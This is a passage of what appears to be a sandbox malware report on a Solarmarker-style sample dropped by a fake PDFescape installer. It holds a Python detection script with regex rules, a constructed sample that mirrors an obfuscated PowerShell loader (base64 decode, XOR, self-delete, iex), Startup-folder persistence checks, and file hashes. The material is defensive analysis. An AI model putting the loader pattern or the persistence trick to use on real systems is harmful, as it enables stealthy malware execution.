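    ("self_delete",   re.compile(r"remove-item\s+\$", re.I), 2),
    # 32-hex-character variable names and directory chains, as in the captured line
    ("hex_varnames",  re.compile(r"\$[0-9a-f]{32}\b", re.I), 1),
    ("hex_dir_chain", re.compile(r"(?:\\[0-9a-f]{32}){3,}", re.I), 2),
]
ALERT_THRESHOLD = 5
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
STARTUP_DIR = "\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\"


def image_name(path: str) -> str:
    """File name only, lower-cased: the SysWOW64 and System32 copies of
    powershell.exe must hit the same rule."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_command_line(cmdline: str) -> Tuple[int, List[str]]:
    hits = [name for name, rx, _ in CMDLINE_RULES if rx.search(cmdline)]
    score = sum(w for name, _, w in CMDLINE_RULES if name in hits)
    return score, hits


def evaluate(event: Dict) -> Optional[Dict]:
    """Alert dict for a suspicious record, None otherwise."""
    if event["EventID"] == 1 and image_name(event["Image"]) in SCRIPT_HOSTS:
        score, hits = score_command_line(event["CommandLine"])
        if score >= ALERT_THRESHOLD:
            return {"rule": "obfuscated_ps_loader", "pid": event["ProcessId"],
                    "score": score, "hits": hits}
    elif event["EventID"] == 11 and image_name(event["Image"]) in SCRIPT_HOSTS:
        # NTFS is case-insensitive, so compare lower-cased: the
        # MIcroSOft\WiNdOws\stArT meNU spelling must not slip past.
        target = event["TargetFilename"].replace("/", "\\").lower()
        if STARTUP_DIR in target and target.endswith(".lnk"):
            return {"rule": "startup_lnk_from_script_host", "pid": event["ProcessId"],
                    "score": ALERT_THRESHOLD, "hits": ["startup_lnk"]}
    return None


def run(events: List[Dict]) -> List[Dict]:
    return [a for a in (evaluate(e) for e in events) if a]


def correlate(alerts: List[Dict]) -> Set[int]:
    """Process ids that both ran the loader and wrote a Startup .lnk."""
    rules_by_pid: Dict[int, Set[str]] = {}
    for a in alerts:
        rules_by_pid.setdefault(a["pid"], set()).add(a["rule"])
    return {pid for pid, rules in rules_by_pid.items()
            if {"obfuscated_ps_loader", "startup_lnk_from_script_host"} <= rules}


# Constructed records (not from the sandbox run).  The first mirrors the shape
# of the captured command line with shortened, made-up names and paths.
V1, V2, V3 = "0" * 31 + "1", "0" * 31 + "2", "0" * 31 + "3"
DROP_DIR = "C:\\Users\\Admin\\" + "\\".join(["f" * 32] * 3)
PS32 = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
PS64 = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 3152, "Image": PS32, "CommandLine": (
        f"\"{PS64}\" -command \"${V1}='{DROP_DIR}\\stage';${V2}='key';"
        f"${V3}=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText(${V1}));"
        f"remove-item ${V1};${V3}[0]=${V3}[0] -bxor ${V2}[0];iex ${V3};\"")},
    {"EventID": 1, "ProcessId": 4000, "Image": PS64,
     "CommandLine": f"\"{PS64}\" -command \"Get-ChildItem C:\\logs | Measure-Object\""},
    {"EventID": 1, "ProcessId": 4001, "Image": PS64,
     "CommandLine": f"\"{PS64}\" -command \"[IO.File]::WriteAllBytes('C:\\tmp\\cert.der',[Convert]::FromBase64String($pem))\""},
    {"EventID": 11, "ProcessId": 3152, "Image": PS32, "TargetFilename":
        "C:\\Users\\Admin\\AppData\\Roaming\\MIcroSOft\\WiNdOws\\stArT meNU\\ProGRamS\\startUP\\a5f7f8402a94f0a5809d08c468cdb.LNk"},
    {"EventID": 11, "ProcessId": 1234, "Image": "C:\\Windows\\explorer.exe",
     "TargetFilename": "C:\\Users\\Admin\\Desktop\\Notes.lnk"},
]

if __name__ == "__main__":
    found = run(SAMPLE_EVENTS)
    for a in found:
        print(a)
    print("pids with loader + Startup persistence:", correlate(found))
```

The weighting keeps a lone FromBase64String (common in legitimate certificate and configuration handling, as the third sample shows) below the threshold; it is the combination with -bxor, self-deletion and iex that pushes a record over. Tune the threshold and the hex-name rules to your own baseline before deploying.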
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dll
MD5 a733c1f89219252497e94cbc66272478
SHA1 f5f9be9a2345f6dc0414c3b62b4087faa32ce351
SHA256 557bb1a545eac9c352dbbe15fbf383d29c6b2640b8cf74e49fefcdee97270547
SHA512 875b4958cadbd8901f4fcb6c5c12f24e2112dbd287975134c6f83573d6ce679be0058dc259ab1db31a64dc48470622c80e75555e43a240e63854df859b65e0bd
-
C:\Program Files\PDFescape Desktop\atom.dll
MD5 9148f07e6dedce3e8e6a642fba0402d8
SHA1 2e403f6b65bf4519d0883ebb0025d77130105a1c
SHA256 35bd82d881759b2aa8ef6dc6e26d0943a19593b2192d207b4440c6e1a29ba05a
SHA512 8f7ab028af2b782df35bf9940a8f367ac49f015d8302242d553e9437882b1fb76ebc91f3dfe2faadd2cde07af260e8ad140e3a59f0f44c05188ebf2bcfe016cb
-
C:\Program Files\PDFescape Desktop\brand.dll
MD5 594a3e3adcf139e7b20eddd1f16131d3
SHA1 7700c89b10e779fc6db72b42be0a81fe89378f9a
SHA256 52163973b0cf8d46bcd1fb26c58f8ab2f7b31fb7e2b05ded2b59ae8d4e2332ad
SHA512 d1240865fc5bfcd0c17205ce866be49b76ae31fccaaa724859822a6311e0e5bb6df2642b5659c1ad20414d79c6c9abbe74419ad4474fa71cbc4e8cab57d0c7cc
-
C:\Program Files\PDFescape Desktop\context-menu.dll
MD5 2c9f26866787b200996d99ad160be2b2
SHA1 fec80f5b4a6acf29f74a2bc8918298518a487597
SHA256 4e3a2ed474ffdb02b4a177cd748cdb31b63f1f1fe3c32bf64cedfc06b6528a57
SHA512 9ade4951f2297ad233bbd41103c8a686a6098cdb2f88ad63eec8742e3bacb85fc02357a58163139259274ed6f3a1299d07b7b7db43bf8eb539c1e0fec018d6dd
-
C:\Program Files\PDFescape Desktop\encoding-conversion.dll
MD5 448a6de619faf0f403c897b142f619c5
SHA1 e76953f8ee3c207b44d2e7c92eaabd5e6deee4d2
SHA256 00a91d382e5e4a04071b208e4717c0f53e7d7146db1ab542f3fb3358f8aa4c51
SHA512 f4e450e63a7105796fe78d90731c62804cf2ee5d2ac706525684b5c4eb20552126d1a2393acb5d5b4ee59ca4a4429aab9403510aa7947b2ef6f3eb36cbd3348d
-
C:\Program Files\PDFescape Desktop\libcrypto-1_1-x64.dll
MD5 ff8eff50eb5617340e3deedbcdf6e631
SHA1 91ebda9ef152340d68b94c7b853f97c806cb3d58
SHA256 f1dd94b6e80e0ab91c7124d9a5ed37bcd70a61ba28721d3247e816de669c3f16
SHA512 c1f889bc348552a46a25c18abe7633b73feb5e59c39db891bae43b5e25adbb96a5bcb259728911cb9b067b530633115027fb02f46ae684096189331ca2d1a2de
-
C:\Program Files\PDFescape Desktop\libcurl.dll
MD5 140cdda2f51d89dc194a8b8c3ab9e463
SHA1 255180975a70d00d31d516ecc895e42fd18c24bf
SHA256 a30c086bb16c702985df2193d1e52cfb15b978a679de014b449a95eb9a233c15
SHA512 5065efa34b3289be247a5bc3f677afae7a86753fc37f816da70d54d1986b6dfe8cc73ad13900020a99fec7de71bd4d23e02bf73fab6be220db1c65482ca860a4
-
C:\Program Files\PDFescape Desktop\libssl-1_1-x64.dll
MD5 62dc606e7f85f8f15a582a045e394d19
SHA1 bad647ebb9207e2b20d464c6b420c84b971519d2
SHA256 7a91d83167c864b5381667370b95fe6081290c61356c90def9a25cf7b3d9c411
SHA512 d7e8c1e9abf695db2b1038c5231ccbc3c2cfd89171e4df3d7a13d8979c096772feace7dacbbb347a657e4e5519240813f8953b75c80259cd256245a9ef2f7e8f
-
C:\Program Files\PDFescape Desktop\pdfcore.dll
MD5 c10d1adf13c2edde02e6adf49d1c900b
SHA1 4455fc9f229dedf4dd5622e6675c7a03ac8bd4d6
SHA256 6e028640b313e136a28c77245700a5b2a604935fc55f4454888192b685081d44
SHA512 0768d3372e652282d3cd0e5fa9e697949d682fa4e3c9ee8d70461588baa07243271129ec5b300c1893820fddaafda12867605c1c5858d57efa9e3fd65ca28fbe
-
C:\Program Files\PDFescape Desktop\pdfgraphics.dll
MD5 1fc38631bf08eff07e8466f69ce90a46
SHA1 3973584e1371dfb26ae31cb4b555c972bd30f5a4
SHA256 78c09e4d384f1b3df9e9e00798f5f048b41866af5e0c16b7e463e6bdd695ec89
SHA512 5818d9f22cf865c12b08f684cb3cced4f55036f78df36d88cdb2530134f3db3170729b1212598ce6371c67ddd9eb887ff3e1fc551c258ee0ce3bd722529a63db
-
C:\Program Files\PDFescape Desktop\pdfview.dll
MD5 40ca796430abed5d369f0781af26481e
SHA1 49abef703e2c9c70e691d8971505691402c2e745
SHA256 e303c331da06258aa0f726ae95dc51f65bb3de88e8fa431a7542e867e208ad19
SHA512 38a5be054afaddc28345860f23bb5824d8079b27d97862917a345460de7c131b8fbf41451248cc7efd60596cd5e0202160c9710992bac073b88b2b83074fa5b8
-
C:\Program Files\PDFescape Desktop\preview-handler.dll
MD5 0a58eba4b339c0bb6f44a314ee06d7c7
SHA1 136b337a2c80fce2e4c0732fe5c821d58aad7d40
SHA256 32dbc446d09e062568989bace5cc19772e2dbeccec681dd8f38ef27cf5aab47a
SHA512 18d664f0242412a2e0acece5a7a8de5f1be6816b80b5665192bab2d2868e682ef43cd275d8be276ef909663bd11233c972c5f7856a32663f3876ca5a8475ad85
-
C:\Program Files\PDFescape Desktop\root-service-provider.dll
MD5 58c639f842629bf97596add29b0ad19c
SHA1 059b152148a8fb92f9b8f119fa95608240ea2957
SHA256 40b0061cec34d9e7ce84b01a3d30e9d7eb2bcd71b9110b06680767ec7f9da503
SHA512 f304dd099df5e63ebea6f87a27b718bf7f1d7b995f77ea9cb0cbcbdc621d999eb5a1eca76b50a6e96a7e5e8d136e050fdcd04b9894743f254665537e35ad473a
-
C:\Program Files\PDFescape Desktop\thumbnail-handler.dll
MD5 5c467cd8042003e71597dccb53a03bfb
SHA1 134db7349cfc485ee5f32b9583210843e02acdda
SHA256 2f6c64fe4b3c69d4f2235a461d74497e37c0eb3fb2432191370c2430848d5c85
SHA512 b1782bd052e98cfd026067992180764965fcfec3c9b840512d522f0ed2278920616ac292d6332b9be0b5829c33bcabc4409bc0fceafe17290b1b13cc3a67dd99
-
C:\Program Files\PDFescape Desktop\ws.exe
MD5 c86fef0f4c86065fda9368fe5a1043d0
SHA1 9c858857549675608c933b980d2f74c0ffaaa769
SHA256 f88a861823f995c48ddb7afe8f4be90a5d1ea5deff3df0b0c152fa0e5c2f1b65
SHA512 4674d73eee0741a8faf992e55214a0471702031d6fc922ee8e141750f385169be773d2610f608ed513764359fe1c1f8ed9d2602ff34b346e88bcaf321015b812
-
C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe
MD5 87d28b3d2df1cab3711bf8d3b5b520c2
SHA1 1987a4bf2a37f6538c701461357a52b0bce1b980
SHA256 88472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977
SHA512 19226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4
-
C:\ProgramData\PDFescape Desktop\Installation\Statistics.dll
MD5 e5a591c125fdf21381cf543ed7706c66
SHA1 0baad9f119616ce5d0d39d4cdc9c884c1002a24e
SHA256 15b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6
SHA512 20e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35
-
C:\ProgramData\PDFescape Desktop\Installation\pdfescape-desktop-startup-4.0.24.4617-x64.msi
MD5 692a85c10d2e69d290a14aef95aae86f
SHA1 381b06c12ac1fdcb1aaef79eb376b1f8d8f1c0e1
SHA256 65f598aef6b4ff4cdd5efe63ad7d91f5014c53c5afbfc20e215e7427cc84a84d
SHA512 38a67af0d1f593680e3da8e920ce9bf0e831168aebf4be2fc0fca34835d43e809103316b3cdaf71156aeea72139e0285eecefa6d391c4af2b9ea55745ec0d933
-
C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e
MD5 f49af433f9076c15cab2d858be35b939
SHA1 19fb76407184356e82560714f225a323ec19abc9
SHA256 c9a510a5ea2d8575aa2f33691de5bae9c6086a5ced125a8ca1d6cb41463a5154
SHA512 89163a3cd141906d559711a31a42e0153715eb54c9f5ec25395f34ab338270d98723e0e4bbad57a34440a49886194e58beb0048cd7c4cf9e432ffbaab52fe40c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\42B9A473B4DAF01285A36B4D3C7B1662_178C086B699FD6C56B804AF3EF759CB5
MD5 01ac3f2e5e3ba987a99a75e476a0e4ea
SHA1 5f13b2ff32953265779fcd993e938c6a6f17d000
SHA256 529bac0f2e2aaccdb5ad7f778f7c1e786e76927e83af8d89de0120871ecdc604
SHA512 fa2015732571b3f3a2a7ae7dc2fd8f98367f699090aa4a3ade4eae00e4451996a2a5c9a1287d2c853adefd4b96ccd9ecd42e51073aeb3c29379d42985b9c3b5f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\66AE3BFDF94A732B262342AD2154B86E_ACB5A342F7DC5D176FB6290AA1E0F299
MD5 3a988bae257d280c4de52b1f0cfdcd11
SHA1 e33a9b3005c5f186d96380fec6363eb8c6b1aca2
SHA256 436c4b5ad41c6d6ed8284be6d68c207bdea9798d20c47547fd3ea42b1c55d851
SHA512 c808ed8d35205f491c5d6ca7fd2d6ab2bb8ae218b7300a4e3638c726fd66bde7591929375d2646e88c2acc3cc4c5d5624e5566438e05be98e417568ec98d2f04
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\42B9A473B4DAF01285A36B4D3C7B1662_178C086B699FD6C56B804AF3EF759CB5
MD5 a8eb3605475e9ffca3f23873e0d01389
SHA1 0c7c03393f1ec9ae8f36d2f71a65f92740a8bd49
SHA256 abfeff7608cd7c08ebdf3a18c4555c3d1d41a9132e47d430304957e8c8d55e5c
SHA512 ecb2bdf7226634a2d20def175e6526800474f3fd3f25dbff1510bcf01b7bb4e488f2db1b05f9514e9cafb2e8d8848416ac6323bb30be96a298e3e3438d6eeeab
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\66AE3BFDF94A732B262342AD2154B86E_ACB5A342F7DC5D176FB6290AA1E0F299
MD5 d6f9074c610bf98ec7835f309485119c
SHA1 a86671fcdc38908f07804bb9cc46556dd76332c0
SHA256 a8cd9fb26e405e3ffc60fcee4707aed04c37237128919ea440f4ea4b3ec9d883
SHA512 409c724d4091e9cc601b096260032e8315d04208a5d00a8ca83ea0a91f1d60991c8ba59e76a16881899f845c5a51e12086917660a17390cb99cc2a4a27f648b8
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5 e71a0a7e48b10bde0a9c54387762f33e
SHA1 fed75947f1163b00096e24a46e67d9c21e7eeebd
SHA256 83d7be67d0eb544d655cc8e8eb687c26f772d6a40ebf8394e5c12b248976a2de
SHA512 394c25daef6143de894505189b1edcdffb82fd6ab9de1c9e43865fb790803ff5c384debfe16236d4a9d95a78d3eea548d3cef332ed5a6881ac9c50d252c3c34a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5 c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA1 75c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA256 91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512 db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5 0d95ffaf393e5caf20ce8889cee21841
SHA1 a9b8a8bd8a32b2260353e49310b298f453e9ca7f
SHA256 537526a67dee1339878b4d18f9d6eb87eb4421a2abf76ad3531fb6745cdc3186
SHA512 bb2f23b54976fc2289ba7a2fa802a68bca49a107f07b5354c82362367f99d7bf139c088bca7cd61d3ae974ecf39120ec84d4df443b7fed7943011befe61721d1
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5 d7d5402dcb0d1835c8282b3a5e7d1485
SHA1 ece607e292c547663a8b8858dc36651ae8c14c10
SHA256 0eeacd1cb2f5f2ea43ad0ea45bc5526873233a0ab9b7f9dfd8a81b2c053b86a1
SHA512 4dbe9e043a79f082db1fabb5c6f9572384ea5dbb85238692e2068b7f1fb7b2444325fee0a883ea1efa712b9e423757fccacb48cca16e7348613a654eff757ccb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5 5a32ddf9c0815f39124fc5a1e64f95f3
SHA1 64784584c0ed75dd44e0467b618837446e303d9f
SHA256 1af6b9c9a8fe039876ed17a2ac0d99b22cb7e575b0e7680df5edc133708d46a4
SHA512 72bca80bee9a859dfa268c78f27014c70869f564c6f00df0217b77f7471bcf319918a42b342e86629a3b5d0311838c99ca777252cfca53ff4cb9ff8f51b7fa81
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5 1f26dc8a90af9107d69a584c31cad926
SHA1 0e4c8476dfc59791bae324a83da21fb02cf9f775
SHA256 93592f408ea5b0befd9f7a1a86df97f6a11ee7403a9041014b81865e119f9ad4
SHA512 6df2ca41fd8320bab1b145da8c2fa348e9d8e1f4c36bd12bcfdad8a1ebdddef9c373ca64c54e324e01bf34073cb13f20e22d44498d1b1c688a8094d2cdef6d7c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5 4a1a45b2df7004522b064ec966a09d84
SHA1 94534e5dfa0e158ed7e7096594c1beba7e8a02ad
SHA256 e6a28952ad3057cb0182cd16f50a16b45234b475bff98dac456def8701216e1d
SHA512 5f70c25e423804488f120546f5275aa4b99a0bbfccac2a93811cb5bd70d6d8eaeac71e743eca9469fef275ce3b1bcb765518a7dc9ad50ac70fba07f4b83e4fb5
-
C:\Users\Admin\AppData\Local\Temp\is-A241P.tmp\PDFescape_Desktop_Installer.exe
MD5 87d28b3d2df1cab3711bf8d3b5b520c2
SHA1 1987a4bf2a37f6538c701461357a52b0bce1b980
SHA256 88472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977
SHA512 19226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4
-
C:\Users\Admin\AppData\Local\Temp\is-A241P.tmp\PDFescape_Desktop_Installer.exeMD5
87d28b3d2df1cab3711bf8d3b5b520c2
SHA11987a4bf2a37f6538c701461357a52b0bce1b980
SHA25688472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977
SHA51219226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4
-
C:\Users\Admin\AppData\Local\Temp\is-HMJ2A.tmp\Choir-Director-Evaluation-Form.tmpMD5
0dc8e93706ff1b10cd6d60ab0ec15d88
SHA19e9c66127ba35ca4ee66fb3fa8820a683d4c943e
SHA2563b79aab07b9461a9d4f3c579555ee024888abcda4f5cc23eac5236a56bf740c7
SHA5120dbbd64f27055997279e36254ba2515b3672b41ef037777fd7490c0d0fa22f791934b483d281a33e542d9f5ee48bac73f2817e1dd93b0e3484c4c5653c8dbf66
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
a69ba7ee020df560b91658a4b6759a1d
SHA13b01e0e55a095318ba9b5ed26a2b96bdd92cf56f
SHA2562dc0c090064cedbd82ef577b341fbf633d20b013f6efea07e01855c450f6eef1
SHA5124713f74285c6c332f9a9a914ef799c65304556f17b3d89161d09a6b9f1d514130f1a99955afce97b19a6538edbbb6670020b03d2c4b88d2652d4cc442ff9d7e1
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
4e8045b7833e51d62c8d20cf221679ce
SHA155d87ce28e0be96030e25e3ade85afc31379b8b4
SHA25646b1bf0b17d9bf1ea1be3c15f72a9ac850e1143c0087eaaae2f7769a79f26c5f
SHA51232262e1021f7f37286acf15f9a184ebed00ae12d6f67fd342b2247be58ab4300b803d5b2d738eb30a0bf77c0448c720fbf848bf046938e00a3982c110062562b
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
4e8045b7833e51d62c8d20cf221679ce
SHA155d87ce28e0be96030e25e3ade85afc31379b8b4
SHA25646b1bf0b17d9bf1ea1be3c15f72a9ac850e1143c0087eaaae2f7769a79f26c5f
SHA51232262e1021f7f37286acf15f9a184ebed00ae12d6f67fd342b2247be58ab4300b803d5b2d738eb30a0bf77c0448c720fbf848bf046938e00a3982c110062562b
-
C:\Users\Admin\appdata\roaming\solarmarker.datMD5
cb643808bd6b82a3d15d89a24391364f
SHA122e573e4797dc78b294080278a166d84f4e56350
SHA256908a75eb3b675b1d043b443539acfed1f2d536a98c3bc2a5f0a287a24acd43a9
SHA5126f4287d00476f7d349be7d0da64111d4494dd83de8d00fbcf0efbcc3cd8086fac467ba4bc04e52119cf88a1c61f2f9034a91b528d1592966e92c31d6b4c621f4
-
\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dllMD5
a733c1f89219252497e94cbc66272478
SHA1f5f9be9a2345f6dc0414c3b62b4087faa32ce351
SHA256557bb1a545eac9c352dbbe15fbf383d29c6b2640b8cf74e49fefcdee97270547
SHA512875b4958cadbd8901f4fcb6c5c12f24e2112dbd287975134c6f83573d6ce679be0058dc259ab1db31a64dc48470622c80e75555e43a240e63854df859b65e0bd
-
\Program Files\PDFescape Desktop\atom.dllMD5
9148f07e6dedce3e8e6a642fba0402d8
SHA12e403f6b65bf4519d0883ebb0025d77130105a1c
SHA25635bd82d881759b2aa8ef6dc6e26d0943a19593b2192d207b4440c6e1a29ba05a
SHA5128f7ab028af2b782df35bf9940a8f367ac49f015d8302242d553e9437882b1fb76ebc91f3dfe2faadd2cde07af260e8ad140e3a59f0f44c05188ebf2bcfe016cb
-
\Program Files\PDFescape Desktop\brand.dllMD5
594a3e3adcf139e7b20eddd1f16131d3
SHA17700c89b10e779fc6db72b42be0a81fe89378f9a
SHA25652163973b0cf8d46bcd1fb26c58f8ab2f7b31fb7e2b05ded2b59ae8d4e2332ad
SHA512d1240865fc5bfcd0c17205ce866be49b76ae31fccaaa724859822a6311e0e5bb6df2642b5659c1ad20414d79c6c9abbe74419ad4474fa71cbc4e8cab57d0c7cc
-
\Program Files\PDFescape Desktop\context-menu.dllMD5
2c9f26866787b200996d99ad160be2b2
SHA1fec80f5b4a6acf29f74a2bc8918298518a487597
SHA2564e3a2ed474ffdb02b4a177cd748cdb31b63f1f1fe3c32bf64cedfc06b6528a57
SHA5129ade4951f2297ad233bbd41103c8a686a6098cdb2f88ad63eec8742e3bacb85fc02357a58163139259274ed6f3a1299d07b7b7db43bf8eb539c1e0fec018d6dd
-
\Program Files\PDFescape Desktop\encoding-conversion.dllMD5
448a6de619faf0f403c897b142f619c5
SHA1e76953f8ee3c207b44d2e7c92eaabd5e6deee4d2
SHA25600a91d382e5e4a04071b208e4717c0f53e7d7146db1ab542f3fb3358f8aa4c51
SHA512f4e450e63a7105796fe78d90731c62804cf2ee5d2ac706525684b5c4eb20552126d1a2393acb5d5b4ee59ca4a4429aab9403510aa7947b2ef6f3eb36cbd3348d
-
\Program Files\PDFescape Desktop\encoding-conversion.dllMD5
448a6de619faf0f403c897b142f619c5
SHA1e76953f8ee3c207b44d2e7c92eaabd5e6deee4d2
SHA25600a91d382e5e4a04071b208e4717c0f53e7d7146db1ab542f3fb3358f8aa4c51
SHA512f4e450e63a7105796fe78d90731c62804cf2ee5d2ac706525684b5c4eb20552126d1a2393acb5d5b4ee59ca4a4429aab9403510aa7947b2ef6f3eb36cbd3348d
-
\Program Files\PDFescape Desktop\encoding-conversion.dllMD5
448a6de619faf0f403c897b142f619c5
SHA1e76953f8ee3c207b44d2e7c92eaabd5e6deee4d2
SHA25600a91d382e5e4a04071b208e4717c0f53e7d7146db1ab542f3fb3358f8aa4c51
SHA512f4e450e63a7105796fe78d90731c62804cf2ee5d2ac706525684b5c4eb20552126d1a2393acb5d5b4ee59ca4a4429aab9403510aa7947b2ef6f3eb36cbd3348d
-
\Program Files\PDFescape Desktop\libcurl.dllMD5
140cdda2f51d89dc194a8b8c3ab9e463
SHA1255180975a70d00d31d516ecc895e42fd18c24bf
SHA256a30c086bb16c702985df2193d1e52cfb15b978a679de014b449a95eb9a233c15
SHA5125065efa34b3289be247a5bc3f677afae7a86753fc37f816da70d54d1986b6dfe8cc73ad13900020a99fec7de71bd4d23e02bf73fab6be220db1c65482ca860a4
-
\Program Files\PDFescape Desktop\pdfcore.dllMD5
c10d1adf13c2edde02e6adf49d1c900b
SHA14455fc9f229dedf4dd5622e6675c7a03ac8bd4d6
SHA2566e028640b313e136a28c77245700a5b2a604935fc55f4454888192b685081d44
SHA5120768d3372e652282d3cd0e5fa9e697949d682fa4e3c9ee8d70461588baa07243271129ec5b300c1893820fddaafda12867605c1c5858d57efa9e3fd65ca28fbe
-
\Program Files\PDFescape Desktop\pdfcore.dllMD5
c10d1adf13c2edde02e6adf49d1c900b
SHA14455fc9f229dedf4dd5622e6675c7a03ac8bd4d6
SHA2566e028640b313e136a28c77245700a5b2a604935fc55f4454888192b685081d44
SHA5120768d3372e652282d3cd0e5fa9e697949d682fa4e3c9ee8d70461588baa07243271129ec5b300c1893820fddaafda12867605c1c5858d57efa9e3fd65ca28fbe
-
\Program Files\PDFescape Desktop\pdfgraphics.dllMD5
1fc38631bf08eff07e8466f69ce90a46
SHA13973584e1371dfb26ae31cb4b555c972bd30f5a4
SHA25678c09e4d384f1b3df9e9e00798f5f048b41866af5e0c16b7e463e6bdd695ec89
SHA5125818d9f22cf865c12b08f684cb3cced4f55036f78df36d88cdb2530134f3db3170729b1212598ce6371c67ddd9eb887ff3e1fc551c258ee0ce3bd722529a63db
-
\Program Files\PDFescape Desktop\pdfview.dllMD5
40ca796430abed5d369f0781af26481e
SHA149abef703e2c9c70e691d8971505691402c2e745
SHA256e303c331da06258aa0f726ae95dc51f65bb3de88e8fa431a7542e867e208ad19
SHA51238a5be054afaddc28345860f23bb5824d8079b27d97862917a345460de7c131b8fbf41451248cc7efd60596cd5e0202160c9710992bac073b88b2b83074fa5b8
-
\Program Files\PDFescape Desktop\preview-handler.dllMD5
0a58eba4b339c0bb6f44a314ee06d7c7
SHA1136b337a2c80fce2e4c0732fe5c821d58aad7d40
SHA25632dbc446d09e062568989bace5cc19772e2dbeccec681dd8f38ef27cf5aab47a
SHA51218d664f0242412a2e0acece5a7a8de5f1be6816b80b5665192bab2d2868e682ef43cd275d8be276ef909663bd11233c972c5f7856a32663f3876ca5a8475ad85
-
\Program Files\PDFescape Desktop\root-service-provider.dllMD5
58c639f842629bf97596add29b0ad19c
SHA1059b152148a8fb92f9b8f119fa95608240ea2957
SHA25640b0061cec34d9e7ce84b01a3d30e9d7eb2bcd71b9110b06680767ec7f9da503
SHA512f304dd099df5e63ebea6f87a27b718bf7f1d7b995f77ea9cb0cbcbdc621d999eb5a1eca76b50a6e96a7e5e8d136e050fdcd04b9894743f254665537e35ad473a
-
\Program Files\PDFescape Desktop\thumbnail-handler.dllMD5
5c467cd8042003e71597dccb53a03bfb
SHA1134db7349cfc485ee5f32b9583210843e02acdda
SHA2562f6c64fe4b3c69d4f2235a461d74497e37c0eb3fb2432191370c2430848d5c85
SHA512b1782bd052e98cfd026067992180764965fcfec3c9b840512d522f0ed2278920616ac292d6332b9be0b5829c33bcabc4409bc0fceafe17290b1b13cc3a67dd99
-
\ProgramData\PDFescape Desktop\Installation\Statistics.dllMD5
e5a591c125fdf21381cf543ed7706c66
SHA10baad9f119616ce5d0d39d4cdc9c884c1002a24e
SHA25615b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6
SHA51220e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35
-
\ProgramData\PDFescape Desktop\Installation\Statistics.dllMD5
e5a591c125fdf21381cf543ed7706c66
SHA10baad9f119616ce5d0d39d4cdc9c884c1002a24e
SHA25615b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6
SHA51220e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35
-
